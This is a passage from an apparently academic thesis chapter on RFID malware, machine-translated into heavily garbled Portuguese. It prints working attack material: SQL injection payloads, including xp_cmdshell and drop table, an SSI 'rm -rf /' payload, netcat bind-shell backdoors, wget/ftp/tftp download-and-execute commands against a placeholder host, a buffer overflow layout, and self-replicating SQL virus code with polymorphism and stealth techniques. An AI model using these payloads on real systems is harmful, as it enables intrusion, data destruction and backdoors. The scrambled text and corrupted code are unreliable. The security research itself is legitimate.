middleware provvel que tenha muitos buracos explorveis. Em contraste, menor "Home-grown" Os sistemas de RFID middleware, provavelmente, ter menos linhas de cdigo, mas eles tambm provavelmente sofrem de testes insuficientes. 2. Protocolos genricos e Instalaes. Com base na Internet j existente infraestrutura tura uma soluo escalvel, boa relao custo-benefcio para desenvolver middleware RFID. Como nunca, adotando protocolos da Internet tambm provoca middleware RFID para herdar adicional de bagagem, como vulnerabilidades de segurana conhecidas. A EPCrede global exemplifica esta tendncia, adotando o nome de domnio Systemperatura (DNS), Uniform Resource Identifiers (URIs) e Extensible Markup 3.Language (XML). back-end. A essncia do RFID coleta de dados automatizadaBancos de dados o. No entanto, os dados coletados tag devem ser armazenados e consultados, para cumprir maiores propsitos de aplicao. Bases de dados so, portanto, uma parte crtica da maioria RFID sistemas - um fato que se destaca pela participao de tradicionais fornecedores de banco de dados como SAP e Oracle, com middleware RFID comercial de desenvolvimento. A m notcia que bancos de dados tambm so suscetveis segurana Data. Sistemas de RFID so um alvo atraente para computador crim4. Alta Valor violaes. Pior ainda, eles ainda tm suas prprias classes nicas de vezes inals. Dados RFID pode ter um carter financeiro ou pessoal, e por ataques. vezes at mesmo importante para a segurana nacional (ou seja, os dados sobre passaportes digital.) Tornando a situao pior, malware RFID tambm poderia levar mais danos do que o malware baseado em computador normal. Isto porque RFID malsoftware tem efeitos colaterais do mundo real: alm de prejudicar back-end sistemas de TI, tambm susceptveis de prejudicar tagged objetos do mundo real. 5. Falsa sensao de segurana. A maioria dos ataques de hackers exploram alvos fceis, e sistemas de RFID so susceptveis de ser vulnerveis, porque ningum espera RFID malware (ainda), especialmente no em sistemas offline RFID. RFID middleware os desenvolvedores precisam tomar medidas para proteger seus sistemas (Veja Seo 4.5), e esperamos que essa tese ir lev-los a fazer isso.

4.2. RFID OVERVIEW MALWARE


Esta seo ir apresentar os trs tipos principais de RFID malware: RFID exploits, worms RFID, RFID e vrus. RFID Exploits As etiquetas RFID podem explorar diretamente back-end middleware RFID. Skeptiques poderia perguntar, "tags RFID so to recurso limitado que no pode mesmo proteger

SCE . 4,2

RFID M ALWARE OANORMICA

43

si mesmos (iewith criptografia) - assim como eles poderiam lanar um ataque nunca "? A verdade, porm, que a explorao middleware RFID exige mais criatividade de recursos. A manipulao de menos de 1 Kbits de dados on-tag RFID pode explorar falhas de segurana em RFID middleware, subvertendo sua segurana, e talvez mesmo comprometer todo o computador ou a rede inteira! Quando um leitor de RFID varre uma tag, que espera receber informaes em um prformato determinado. Entretanto, um invasor poderia escrever cuidadosamente os dados criados em um RFID tag, que to inesperada que o seu processamento corrompe o leitor de back-end software. RFID exploits componentes alvo especfico do sistema, como bancos de dados, web interfaces, e cola o cdigo (isto , leitor RFID APIs) utilizando uma srie de ferramentas de hacking que incluem estouros de buffer, a insero de cdigo, e ataques de injeo SQL. Mafiguras licious pode realizar esses ataques usando etiquetas RFID de baixo custo, sem contato cartes inteligentes (mais espao de armazenamento permite que os ataques mais complexos), ou ricos em recursos Dispositivos RFID tag simulando (que so de pleno direito computadores). RFID Worms Um worm um programa que se auto-propaga atravs de uma rede, exploiting falhas de segurana em servios amplamente utilizados. Um worm distinguvel de uma vrus em um worm que no requer qualquer atividade do usurio para propagar [166]. Worms geralmente tm uma "carga", que realiza atividades que vo desde a excluso de arquivos, ao envio de informaes via e-mail, para instalao de patches de software. Um dos mais payloads comum para um worm para instalar uma "backdoor" no computador infectado, que concede hackers acesso fcil voltar a esse sistema de computador no futuro. Um worm se propaga por RFID explorando falhas de segurana em RFID on-line servcios. Worms RFID no necessariamente exigem que os usurios de fazer qualquer coisa (como a digitalizao Tags RFID) para se propagar, embora eles tambm feliz se espalham atravs de etiquetas RFID, se Vrus a oportunidade. dada RFID Enquanto worms RFID contar com a presena de uma rede de coneAlm disso, uma verdadeira auto-replicao de vrus de RFID totalmente autosuficiente, apenas uma pessoa infectada RFID tag necessria para espalhar o ataque viral. Aqui esto alguns exemplos de como os vrus de RFID poderia espalhar-se: 1. Um brincalho cria uma tag RFID com um vrus e injeta-o em um gato ou coloca sob coleira do gato. Ele ento vai a um veterinrio ou para a Sociedade Americana de a Preveno da Crueldade contra Animais (ASPCA), alegando que ele encontrou um gato de rua, e pede uma tomografia. Bingo, o banco de dados est infectado. Desde o veterinrio ou ASPCA usa esse banco de dados durante a criao de tags RFID para recmencontrada (ou comprado) animais, estas novas etiquetas tambm podem ser infectados. Quando Estas tags so depois digitalizados por qualquer razo, esse banco de dados est infectado, e assim por diante. Ao contrrio de um vrus biolgico, que salta de animal para animal,

44

RFID M ALWARE

CHAP. 4

o vrus se espalha RFID saltando do animal ao banco de dados para animal. O mecanismo de transmisso mesmo que se aplica aos animais de estimao tambm se aplica a RFID gado marcado, (ou Verichip-tagged clubgoers em Barcelona). 2. Alguns aeroportos agilizar o manuseio de bagagem usando etiquetas RFID nos rtulos anexado ao malas. Agora considere um viajante mal-intencionados que coloca uma emtag RFID infectadas em uma mala e verifica-lo dentro Quando o tratamento de bagagem RFID sistema leitor de scans a mala em uma juno Y-in do transportadorcinto de sistema para determinar para onde encaminh-lo, a etiqueta responde com um vrus que infecta banco de dados do aeroporto de bagagem. Como conseqncia, todas as etiquetas RFID produzido como novos passageiros o check-in no final do dia tambm podem ser infectados. Se qualquer um desses sacos de trnsito infectados outro aeroporto, eles sero examinados novamente h, assim, infectar um aeroporto diferente. Dentro de um dia, centenas de aeroporto bases de dados podem estar infectados. Mas as tags meramente infectingother o mais serbenignas RFID PRINCPIOS MALWARE 4.3. PROJETOcaso; um vrus de RFID poderia tambm levar uma carga til que inflige mais danos ao banco de dados, tais como traficantes ou terroristas ajudando a instalar backdoors, ou esconder a sua bagagem de de RFID malware, apresentando Esta seco ir ilustrar os princpios de designfuncionrios de companhias areas e governo. os mecanismos de infeco e cargas teis que podem direcionar RFID normalmente arquitetado sistemas de middleware.

4.3.1. RFID Middleware Architecture


Implementaes de RFID da vida real empregam uma grande variedade de RFID fisicamente distribudos leitores, gateways de acesso, interfaces de gerenciamento e bancos de dados. Para imitar esse RFID middleware, arquitetura criamos uma plataforma de teste modular que ilusilustrado leitor RFID4.1, que temos utilizado com sucesso para atacar vrios RFID, de Nosso na Figura interface consiste de um MIFARE / I.Code Philips leitor bancos dados. em Windows XP. O RFID Reader interface se comunica com os dois rodando ISO-15693 compatvel Philips I. etiquetas Cdigo SLI e Philips MIFARE sem contato cartes inteligentes. A interface de gerenciamento baseada em WWW roda Apache, Perl, e PHP, eo Gateway DB se conecta ao MySQL, Postgres, Oracle e SQL Bases de dados do servidor.

SCE . 4,3

RFID M ALWARE DESIGN PRINCPIOS

45

Figura 4.1: RFID Plataforma de Testes Malware

4.3.2. RFID Exploits


Esta seo ir descrever algumas das formas que o malware pode explorar RFID RFID sistemas de middleware.

SQL Injection Injeo de SQL um tipo de ataque tradicionais "hacking" que engana um banco de dados para executar o cdigo SQL que no se destinava. Os atacantes tm vrias objetivos com a injeo de SQL. Primeiro, eles podem querer "enumerar" (out mapa) a estrutura de banco de dados. Ento, os atacantes podem querer recuperar no autorizadas dados, ou fazer modificaes no autorizadas igualmente ou supresses. RFID tag limitaes de armazenamento de dados no so necessariamente um problema para injeo SQLo ataques porque possvel fazer bastante mal em uma quantidade muito pequena de SQL [7]. Por exemplo, o comando injetado: ; Shutdownser desligado uma instncia do servidor SQL, usando apenas 12 caracteres de entrada. Outro nasty comando : drop table <tablename> que ir excluir a tabela do banco de dados especificado. Muitos bancos de dados tambm suportam IF / THEN construes, o que poderia destruir o banco de dados em um tempo predeterminado, assim, permitiring o vrus se espalhe primeiro a outros bancos de dados. RFID baseado exploits podem at mesmo

46

RFID M ALWARE

CHAP. 4

"Roubar" os dados do banco de dados, copiando-o de volta para a tag RFID ofender usando uma consulta incorporada SELECT. Bases de dados s vezes tambm permitir que os administradores DB para executar sistema de comcomandos. Por exemplo, Microsoft SQL Server executa os comandos usando o 'xp cmdshell' procedimento armazenado. O atacante pode usar isso para comprometer o sistema de computador temperatura, pelo e-mail de arquivos do sistema de senhas sombras para um determinado local. Assim como com ataques de injeo SQL padro, se a DB est sendo executado como root, infectados RFID Tag poderia comprometer um computador inteiro, oumalware toda apode tambm alvo na Cdigo de Incluso Alm de bases de dados visando, mesmo RFID rede! web componentes baseados, como interfaces de gerenciamento remoto ou web-based de banco de dados front-ends (como Oracle iSQL * Plus). Cdigo malicioso pode ser injetado em uma apcao por um invasor, usando qualquer nmero de linguagens de scripting, incluindo VBScript, CGI, Java, Javascript, PHP e Perl. HTML insero e Cross-Site Scripting (XSS) so tipos comuns de insero de cdigo. Um sinal diga-conto desses ataques a presena dos seguintes caracteres especiais em dados de entrada: <> "'%;)(&+Para executar ataques de cdigos de insero, os hackers geralmente URLs maliciosos primeira nave, seguido de "engenharia social" os esforos para induzir os usurios a clicar sobre eles [108]. Quando ativados, esses scripts ir executar ataques que vo desde o roubo de cookies, para a sesso WWW seqestro, at mesmo para explorao de vulnerabilidades do navegador web em um tentativa de comprometer todo o computador. Tags RFID com os dados escritos em uma linguagem de script pode executar insero de cdigo ataques a sistemas back-end RFID middleware. Se as aplicaes RFID na Internet protocolos para consultar bancos de dados back-end (como EPCglobal faz), h uma chance de que Clientes middleware RFID pode interpretar as linguagens de script. Se este for o caso, ento RFID middleware ser suscetvel aos problemas mesmo cdigo de insero como navegadores web. Exploits client-side scripting geralmente tm consequncias limitadas porque navegadores web tm acesso limitado para o host. No entanto, uma Javascript baseado em RFID explorar ainda poderia comprometer uma mquina, direcionando o navegador do cliente para um pgina que ip / exploit.wmf' document.location =;como uma imagem contendo o recm-descoberta '% http://% contm contedo malicioso, Ered WMF-bug [161]: Server-side scripting, por outro lado, tem bvias conseqncias de longo alcance; ele pode executar cargas com permisses do servidor web. Server-Side Includes (ISC) pode executar comandos do sistema, como:

SCE . 4,3

RFID M ALWARE DESIGN PRINCPIOS

47

<! - # Exec cmd = "rm-rf /" ->

Estes payloads linguagem de script so ativados quando eles so vistos por um web do cliente (ou seja, a interface de gerenciamento de WWW).

Buffer Overflow Buffer overflows so uma das fontes mais comuns de serana vulnerabilidades no software. Encontrados em ambos os legados e softwares modernos, buffer overflows custo das centenas indstria de software de milhes de dlares por ano. Estouros de buffer tambm desempenharam um papel de destaque em eventos de perna-de hackers fim e lore, incluindo o Morris (1988), Code Red (2001), e SQL Slammer (2003) worms. Estouros de buffer normalmente surgem como conseqncia do uso indevido de languas, como C ou C + + que no so "memria-safe." Funes sem limites verificao (strcpy, strlen, strcat, sprintf, gets), funes com terminao nula probleblemas funes (strncpy, snprintf, strncat), e criado pelo usurio com os erros de ponteiro so capacitadores estouro de buffer notrio [145]. A vida de um estouro de buffer comea quando as entradas de dados um atacante seja diretamente (Isto , via de entrada do usurio) ou indiretamente (isto , atravs de variveis de ambiente). Esses dados de entrada deliberadamente maior que o buffer, por isso substitui tudo aquilo que acontece de vir depois que o buffer na memria. Programa de controle de dados (por exemplo, endereos de retorno de funo) muitas vezes localizadas em reas de memria adjacentes ao buffer de dados. Quando um endereo de retorno da funo substitudo, o programa salta para o endereo errado ao retornar. O atacante pode, ento, ofcio os dados de entrada tal que o retorno pontos endereo para os dados que causou o estouro, em primeiro lugar, portanto, executar este cdigo (shellcode existentes ou personalizados). Tabela 4.1 ilustra um exemplo da vida real de buffer overflow que foi implementado usando a 2 Kbit Texas Instruments ISO-15693 compliant tag RFID. Neste exemplo, o desenvolvedor de middleware RFID espera receber 128 bytes (1 Kbits) de uma tag RFID. Os dados so inseridos no seguinte consulta SQL:
ContainerContents UPDATE SET OldContents = '<tag.data>' WHERE TagId = '<tag.id>'

Como os dados de tag no mximo 128 bytes e os id tag mais como 16 bytes, o programador aloca um buffer de 256 bytes na pilha, que deve ser grande o suficiente para conter a consulta. No entanto, o atacante mostra-se compatvel com a 2 Kbits tag RFID, em vez da esperada uma Kbits tag RFID. O buffer de 256 bytes j parcialmente preenchido pela consulta SQL, assim que os dados da tag Kbit 2 prova suficiente para estourar o buffer e executar comandos shell usando o Microsoft C funo system (), como demonstrado acima.

48

RFID M ALWARE

CHAP. 4

Compensar HexASCII 00 643D 6154 6749 2730 3132 3334 3536 3738TagID = '012345678 10 3941 4243 4445 4627 00? ?? ?? ?? 9ABCDEF'........ dados suficientes para encher o buffer, bytes 192, neste caso, ?? E0F4 1200 68EB F412 00E8 DD9E AC77 ................ ? 73 6865 2063 6C6C 6F6D 6D61 6E64 comandos 7300.shell \ 0 E0 F0
Compensar Feitio E2 E0F4 1200 E6 EB F0 F0 2 68EB F412 00 E8 DD9E AC77 ? comandos shell \ 0 Descrio Endereo de retorno. Este o endereo atual +4, como queremos saltar para a pilha. Empurre 0x0012F4EB. Isso empurra a corda de partida no deslocamento F0 2 na pilha. Chamada 0x77AC9EDD endereo relativo, neste caso, o sistema funo em msvcrt.dll, que implementa o C runtime. O contedo deste byte so substitudos quando o sistema funo chamado, por isso no devem conter quaisquer dados teis. A string que passado para a funo do sistema. Essa seqncia pode estender at o final da tag, enquanto o byte 0 est presente.

Tabela 4.1: RFID de estouro de buffer: Insero de cdigo personalizado por Overflowing um buffer de 256 bytes

Cargas Overflows de buffer RFID pode injetar uma variedade de dependente de plataforma shellcargas de comando. Alm de comandos bvias, como rm, buffer overflow-inprojetada como comandos do sistema netcat pode ser usado para criar backdoors. netcat escuta e em um TCP-port imprime os dados que so recebidos. Estes dados podem ser passados para uma instncia da shell, o que causa comandos a serem executados, conforme demonstrado na o seguinte exemplo: netcat-lp1234 | sh Outro utilitrio til sistema tela. Isso cria uma instncia da shell e destaca-o de seu terminal, de modo que ele seja executado como um processo daemon. Por comnando esta com a capacidade de executar comandos shell remoto, um atacante pode construir um backdoor mais avanados:
tela-DMS t bash-c "enquanto [verdadeiro]; fazer netcat-lp1234 | sh; feito"

Este comando executado em um loop infinito, que permite que o atacante se conectar aos tempos backdoor mltiplas. Outro favorito o wget utilitrio, que baixocarrega arquivos de um web ou ftp-servidores e os armazena no sistema de arquivos local. Este utilitrio pode ser aproveitado para fazer o download e executar programas escritos pelo atacante:

SCE . 4,3

RFID M ALWARE DESIGN PRINCPIOS

49

wget http://ip/myexploit-O / tmp / myexploit; chmod + x tmp / / myexploit; / tmp / myexploit

Em sistemas Windows, ftp podem ser igualmente utilizados:


(Echo BIN annimos & echo & & echo GET myexploit.exe echo quit) >ftp.txt & ftp -S: ip ftp.txt & myexploit

E por isso pode tftp (Com menos caracteres):

tftp-i ip GET myexploit.exe & myexploit

4.3.3. RFID Worms


O Verme RFID processo de infeco comea quando hackers (ou mquinas infectadas) primeiro descobrir servidores middleware RFID para infectar atravs da Internet. Eles usam baseado em rede explora como um "mecanismo transportador" para transmitir-se em o alvo. Um exemplo so os ataques contra Naming EPCglobal objeto do Servio de (ONS) servidores, que so suscetveis a vrios ataques comuns DNS. (Veja [37] para mais detalhes.) Estes ataques podem ser automatizados, proporcionando a propagao mecanismo para um worm de RFID. Worms RFID tambm pode se propagar atravs de tags RFID. Worm infectados RFID meados de dleware pode "contaminar" tags RFID, substituindo os seus dados com um exploit tag-on. Este exploit faz com que novos servidores middleware RFID para baixar e executar um arquivo malicioso de um local remoto. Este arquivo, ento, infectar a meados de RFID dleware servidor da mesma maneira como malware padro do computador, assim, o lanamento uma nova instncia do worm RFID. Aqui est um exemplo de uma carga de injeo de SQL com base worm de RFID que explora ; EXEC SQL Server: MicrosoftMestre .. xp cmdshell "tftp-i% ip% GET myexploit.exe & myexploit 'Esta carga faz com que o SQL Server para executar um comando do sistema que usa tftp (No Windows) para fazer o download e executar o malware estrangeiros. Na mesma linha, os seguintes web-based de carga sem-fim RFID explora a interface de gerenciamento, a auto-replicar via server-side scripting:
<! - # Exec cmd = "wget http://% ip% / myexploit-O / tmp / myexploit; chmod + x / tmp / myexploit; / Tmp / myexploit "->

Overflows baseados em RFID buffer, como descrito anteriormente, tambm podem apresentar worm-like comportamento, pois eles podem alavancar shellcode personalizado para baixar e executar o malware partir de um local externo.

50

RFID M ALWARE

CHAP. 4

4.3.4. Vrus RFID


Esta seo ir explicar como criar um totalmente auto-suficiente RFID vrus; apenas um tag RFID infectado necessrio para espalhar o ataque viral. Cenrio de Aplicao Comearemos nossa discusso vrus RFID atravs da introduo de uma hipottica, mas cenrio de aplicao realista: Um centro de distribuio de supermercados emprega uma automao de armazm sistema com reutilizvel com etiquetas RFID recipientes. Operao do sistema tpico o seguinte: a paletes de recipientes que contenham um produto cru (produtos frescos, por exemplo) passa por um Leitor RFID na chegada ao centro de distribuio. O leitor identifica e disjoga nmeros dos produtos de srie, e ele encaminha a informao para uma empresa banco de dados. Os recipientes so ento esvaziado, lavado e recarregados com um pacote verso do mesmo produto (ou talvez um diferente). Um leitor de RFID ento atualiza dados do continer tag RFID para refletir a nova carga, eo recipiente recarregado enviados para um ramo de supermercados local. O RFID middleware arquitetura para este sistema no muito complicado. O sistema RFID tem vrios leitores RFID no front-end, e um banco de dados o back-end. As etiquetas RFID nos recipientes so de leitura / gravao, e seus dados descreve a carga que est armazenado no recipiente. O back-end de banco de dados RFID tambm armazena informaes sobre os recipientes de carga de entrada e sada ". Para o bem da nossa discusso, vamos dizer que o banco de dados back-end contm uma tabela chamado NewContainerContents: TagID ContainerContents 123 Mas 234 Peras
Tabela 4.2: NewContainerContents Tabela

Esta tabela especial lista o contedo de carga para recipientes recarregados. Segundo para a mesa, o recipiente com RFID tag # 123 sero recarregados com mas, e os recipiente com RFID tag # 234 sero recarregados com peras.

Auto-replicao viral Um dia, um container chega no centro de distribuio de supermercado que carrying uma carga surpreendente. Tag RFID o recipiente est infectado com um computador

SCE . 4,3

RFID M ALWARE DESIGN PRINCPIOS

51

vrus. Este vrus em particular usa RFID de injeo SQL para atacar o RFID back-end middleware sistemas:
Contedo = Framboesas; NewContainerContents UPDATE SET ContainerContents = ContainerContents | | "; [SQL Injection]";

O ataque de injeo SQL localizado aps o ponto e vrgula. Quando executado, o Concatena cdigo SQL injection os dados de 'ContainerContents' coluna na tabela "NewContainerContents com o cdigo completo de injeo SQL. O vrus se espalha da seguinte forma: Quando um novo continer chega, os infectados RFID tag lido pelo sistema de RFID. Enquanto l a tag "dados", a injeo de SQL cdigo executado involuntariamente pelo banco de dados back-end middleware. O SQL de injeo de cdigo , portanto, anexado s descries de contedo dos recipientes sering recarregados. O sistema de gerenciamento de dados, em seguida, passa a escrever estes valores na seo de dados de tags recm-chegados (no-infectados) RFID, aps a sua respectiva recipientes de carga ' descompactado e recarregados. O RFID j infectados com a tag recipientes so ento enviados em seu caminho. As tags recm-infectado infectar outras RFID estabelecimentos "middleware, para aqueles locais que venham a ser executado o mesmo sistema de RFID middleware. Estes sistemas RFID RFID infectar outras tags, que infectam outros sistemas RFID, etc. Isso tudo parece bom em teoria, mas a parte de injeo SQL continua a ser preenchido Desenho dentro da nossa formulao anterior:

[SQL Injection] = ATUALIZAO NewContainerContents ContainerContents SET = ContererContents | | "; [SQL Injection]";

Auto-referencial Comandos Esta declarao de injeo SQL auto-referencial, e precisamos de uma maneira de contornar isso. A maioria dos bancos de dados tm um comando que ir listar as consultas atualmente em execuo. Isto pode ser aproveitado para preencher a autoparte referencial do vrus de RFID. Por exemplo, este como um comando no Oracle:
SQL SELECT TEXT FROM v $ sql ONDE INSTR (TEXT SQL ,''')> 0;

H comandos semelhantes no PostgreSQL, MySQL, Sybase, e outro banco de dados programas. Preenchimento do "get consulta atual" comando, o nosso cdigo RFID total de viral agora est assim:1
Contedo = Framboesas; NewContainerContents UPDATE SET ContainerContents = ContainerContents | | ';' | | CHR (10) | | (SELECT SQL TEXT FROM v $ sql ONDE INSTR (SQL ,''')> TEXT 0);
1Este RFID vrus escrito especificamente para trabalhar com o Oracle SQL * Plus. O CHR (10) um alimentao de linha, necessrios para a consulta para executar corretamente.

52

RFID M ALWARE

CHAP. 4

As capacidades de auto-reprodutivo do vrus RFID esto completos. Quines Uma forma alternativa de RFID viral auto-reproduo usar um SQL quine. A quine um programa que imprime o seu prprio cdigo fonte. Douglas R. Hofstadter cunhou o termo 'quine "em seu livro" Godel, Escher, Bach "[66], em honra de Willard van Orman Quine que primeiro introduziu o conceito. Alguns princpios bsicos se aplicam ao tentar escrever cdigo de auto-reproduzem. O princpio mais importante que Quines consistem de um "cdigo" e "dados" poro. A poro de dados representa o forma textual do quine. O cdigo usa os dados para imprimir o cdigo, e ento usa os dados para imprimir os dados. Hofstadter esclarece isso fazendo a seguinte analogia a biologia celular: o "cdigo" de um quine como uma clula, e os "dados" o de clulas DNA. O DNA contm todas as informaes necessrias para a replicao celular. No entanto, quando uma clula usa o DNA para criar uma nova clula, ele tambm reproduz o DNA em si. Agora que entendemos o que um quine , queremos escrever um em SQL. Aqui um exemplo de um quine SQL (PostgreSQL) [71]:
SELECT substr (fonte, 1,93) | | chr (39) | | fonte | | chr (39) | | substr (fonte 94) FROM (SELECT SELECT 'substr (fonte, 1,93) | | chr (39) | | fonte | | chr (39) | | substr (fonte 94) FROM (SELECT:: texto fonte) q; ':: text como fonte) q;

Este quine SQL simplesmente reproduz a si mesma - e no faz nada mais. Payloads adicionando como Introns Auto-replicao de cdigo SQL puramente uma exmental ercise at que ele faz algo funcional. Gostaramos de adicionar viral "payloads" ao quine SQL, mas no queremos prejudicar sua capacidade de auto-reprodutiva. Para isso, podemos usar introns que so partes de dados quine que no so usados para sada o cdigo quine, mas que ainda so copiados quando os dados so gravados para o outcolocado. O termo "ntron" uma continuao da analogia Hofstadter, que comparou nonessential dados quine com as pores de DNA que no so usados para produzir protenas. A quine ntrons so reproduzidas juntamente com uma quine, mas no so necessrias para a capacidade de auto-reproduo do quine. Portanto, um intron pode ser modificado sem uma penalidade reprodutiva; fazendo introns o lugar perfeito para colocar RFID cargas virais. Aqui est um exemplo de um vrus de RFID quine que explora MySQL:
%% De contedo 'WHERE TagId =' id%% '; SET @ a =' UPDATE ContainerContents SET NewContents = concat ("'contedo %"""'% ONDE TagId ="""'% id %"""'; SET @ a = "", QUOTE (@ a ),"'; "', @ A);%% de carga; - '; ContainerContents UPDATE SET NewContents = concat ('% content% "' WHERE TagId =" '% id% "; SET @ a = 'QUOTE (@ a),'; ', @ a);%% de carga; -

SCE . 4,3

RFID M ALWARE DESIGN PRINCPIOS

53

Este vrus quine RFID armazena seu cdigo-fonte utilizando variveis DB. No entanto, nem todas as variveis do banco de dados fornece, por exemplo, um vrus quine alvo de PsPostgreSQL deve usar funes de DB para armazenar o seu cdigo em seu lugar. Escrevemos vrus RFID quine sucesso que infectam MySQL, SQL Server, PostgreSQL e Oracle iSQL * Plus. Pr-requisitos para vrus quine para trabalho incluem: execuo da consulta SQL mltiplos, a capacidade de usar os comentrios, e no escapar caracteres especiais. Quine vrus tambm suportam cargas, como comandos e scripts client-server-side, sistema e. A desvantagem de quine vrus seu grande tamanho, pois eles necessitam de tags RFID com memrias maiores (Por exemplo, 4 memrias Kbit), em oposio ao mais barato tags (<1024 bits) RFID. (Para referncia, o quine RFID vrus apenas demonstrou possui 307 caracteres, requerendo 2194 bits de RFID armazenamento de dados.) Polimrficos Vrus RFID Avrus polimrfico um vrus que muda sua binary assinatura cada vez que ele replica, dificultando a deteco por programas antivrus. Podemos usar multiquines para criar vrus polimrficos RFID. A multiquine um conjunto de programas que imprimir seu cdigo-fonte prpria, a no ser dado entradas particular, que causam os programas para imprimir o cdigo de outro programa no conjunto [102]. Multiquines trabalho usando introns, o intron de um primeiro programa representa o cdigo de um segundo programa, eo intron do segundo programa representa o cdigo do em primeiro lugar. Vrus polimrficos Multiquine RFID trabalho da mesma forma: quando o vrus passado um parmetro especial, que produz uma representao do segundo vrus; e vice-versa. O parmetro varivel pode ser um timestamp, ou alguma qualidade de o RFID banco de dados back-end que est sendo infectado. Para tornar o vrus indetectvel por correspondncia verdadeiramente assinatura antiviral, encriptaoo tambm seria necessrio para obscurecer a poro do vrus de RFID "cdigo. Surpreendente suficiente, David Madore j demonstrou essa possibilidade - ele escreveu um quine (em C) que armazena o seu prprio cdigo cifrado com a criptografia blowfish algoritmo em seus dados [102]. Infelizmente, este quine suficientemente grande que ele no mais razovel se encaixa em um carto inteligente sem contato. No entanto, ela serve como um exemplo notvel do que pode ser conseguido usando uma dose saudvel do crebro Otimizaes powere totalmente auto-reproduz o cdigo! Os vrus de RFID que acabamos de descrever tem espao considervel para a melhoria. Este seo ir introduzir otimizaes para aumentar a furtividade viral e generalidade. Discrio aumento Os vrus de RFID no so muito furtivos. A injeo de SQL ataque faz mudanas bvias para as tabelas de banco de dados, que pode ser casualmente local

54

RFID M ALWARE

CHAP. 4

ted por um administrador do banco de dados. Para resolver este problema, os vrus de RFID pode esconder as modificaes que eles fazem. Por exemplo, a carga de injeo SQL pode criar e usar procedimentos armazenados para infectar as etiquetas RFID, deixando as tabelas do banco de dados sem modificaes. Desde DB administrators no examinam cdigo de procedimento armazenado to freqentemente quanto eles examinam dados da tabela, provvel que lev-los mais tempo para notar a infeco. No entanto, o desvantagem de usar procedimentos armazenados que cada marca de banco de dados tem a sua prpriaoutro lado, stealth pode programao. Assim, o vrus resultante de RFID. Por base de linguagem de at no ser to importante para o vrus ser razoavelmente banco de dados especfico. de dados pode detectar e corrigir a infeco viral, mas o dano Um administrador de banco j foi feito, se at mesmo um nico recipiente com etiquetas RFID infectado deixou o instalaes.

Generalidade aumento Outro problema com vrus nossa RFID que eles contam sobre uma estrutura de banco de dados subjacente certas, limitando assim reprodutiva do vrus capacidade de uma configurao de middleware especfico. Uma melhoria seria a criao de um mais genrico mecanismo viral reprodutiva, o que pode potencialmente infectar um maior Uma maneira de criar um vrus mais genrico RFID eliminar o nome do variedade de implementaes de RFID. tabela e as colunas do mecanismo reprodutivo. O ataque de injeo SQL poderia, em vez anexar dados vrias tabelas e colunas que venham a ser presentes. A desvantagem dessa abordagem que ela de difcil controle - se os dados acidentalmente anexado coluna TagID, o vrus no vai mesmo reproduzir anymore.

4.4. Exemplo detalhado: ORACLE / SSI VRUS


Yogi Berra disse uma vez: "Em teoria no h diferena entre teoria e prtica. Na prtica, h. "Por essa razo, implementamos o nosso RFID idias malware, para test-los para a sua aplicabilidade no mundo real. Esta seco ir dar uma descrio detalhada de um vrus de RFID impleo que visa especificamente Oracle e Apache Server-Side Includes (SSIS). Este RFID vrus combina auto-replicao com uma carga mal-intencionados, e que o vrus aproveita SQL e ataques de injeo de script. Tambm pequeno o suficiente para caber em uma tag RFID de baixo custo, com apenas 127 caracteres.

SCE . 4,4

DPORMENORIZADA EXEMPLO : O RACLE / SSI V Irus

55

Figura 4.2: A Primeira-Virally Infected Tag RFID

4.4.1. Back-End Arquitetura


Para a arquitetura de back-end, usamos nossa plataforma de teste modular que foi descrito anteriormente na Figura 4.1. Para testar a funcionalidade especfica do Oracleviral, ns utilizada uma mquina Windows rodando o banco de dados Oracle 10g ao lado de um Philips I.Code / MIFARE RFID (etiquetas com cdigo I. SLI). Utilizamos tambm um ma-Linux chine executando a interface de gerenciamento (PHP no Apache) e Gateway DB (Executvel CGI w / OCI biblioteca, verso 10). Um vrus no tem sentido sem um aplicativo de destino, por isso optou-se por continuar no supermercado cenrio de centro de distribuio da Seo 4.3.4. Nossa o Oracle banco de dados , portanto, configurado como segue:
CRIAR ContainerContents TABLE ( TagIDVARCHAR (16), OldContents VARCHAR (128), NewContents VARCHAR (128) );

Como antes, o TagID o 8-byte tag RFID UID (hex-encoded), e as-Velho Coluna de contedo representa o "conhecido" contedo do recipiente, contendo o dados ltimo valor lido do tag RFID. Alm disso, a coluna NewContents representa o contedo de carga recarregados que ainda precisam ser gravados no tag RFID. Se nenhuma atualizao estiver disponvel, esta coluna ser NULL, e os dados de RFID tag no ser reescrito. Uma viso tpica do ContainerContents fornecida na Tabela 4.3.

56

RFID M ALWARE

CHAP. 4

TagID 123 234

OldContents Mas Peras

NewContents Laranjas

Tabela 4.3: ContainerContents Tabela

4.4.2. O Vrus
O vrus Oracle / SSI seguir usa injeo SQL para infectar o banco de dados:
Mas ', NewContents = (select SUBSTR (SQL TEXT, 43127) FROM v $ sql ONDE INSTR (SQL TEXT ,'<!-# exec cmd = "netcat-lp1234 | sh "->')> 0) -

Auto-replicao funciona de forma semelhante como demonstrado anteriormente, utilizando a consulta atualmente em execuo:
SELECIONE SUBSTR (SQL TEXT, 43127) FROM v $ sql ONDE INSTR (TEXT SQL, ... ...)> Payload 0)

No entanto, este vrus tambm tem um bnus em comparao com o anterior, tem uma payload.
<! - # Exec cmd = "netcat-lp1234 | sh" ->

Quando isto Server-Side Include (SSI) ativado pela Administrao Intercara, ele executa 'netcat' o comando do sistema, que abre uma backdoor. O backdoor um shell de comando remoto na porta 1234, que dura para a durao da a execuo SSI.

4.4.3. Infeco de banco de dados


Quando um tag RFID (infectados ou no infectados) chega, o RFID Interface de Leitor l ID da tag e dados, e esses valores so armazenados de forma adequada. O RFID Leitor de interface ento constri consultas, que so enviados para o DB Oracle via o OCI biblioteca. A coluna OldContents atualizado com os dados tag recm-ler, usando a seguinte consulta:

ContainerContents UPDATE SET OldContents = 'tag.data' WHERE TagId = 'tag.id';

Inesperadamente, o vrus explora a consulta UPDATE:


ContainerContents UPDATE SET OldContents = 'Apples', NewContents = (select SUBSTR (TEXTO SQL, 43127) FROM v $ sql ONDE INSTR (TEXT SQL ,'<!-# exec cmd = "netcat-lp1234 | sh "->')> 0) - 'WHERE TagId = '123'

SCE . 4,5

DPORMENORIZADA EXEMPLO : O RACLE / SSI V Irus

57

Isso resulta em duas mudanas para o DB: a coluna OldContents substitudo com 'Apples', ea coluna NewContents substitudo por uma cpia do vrus. Porque os dois traos no final do vrus comentar o original Clusula WHERE, essas mudanas ocorrem em cada linha do banco de dados. Tabela 4.4 ilustra o que a tabela de banco de dados agora parece.
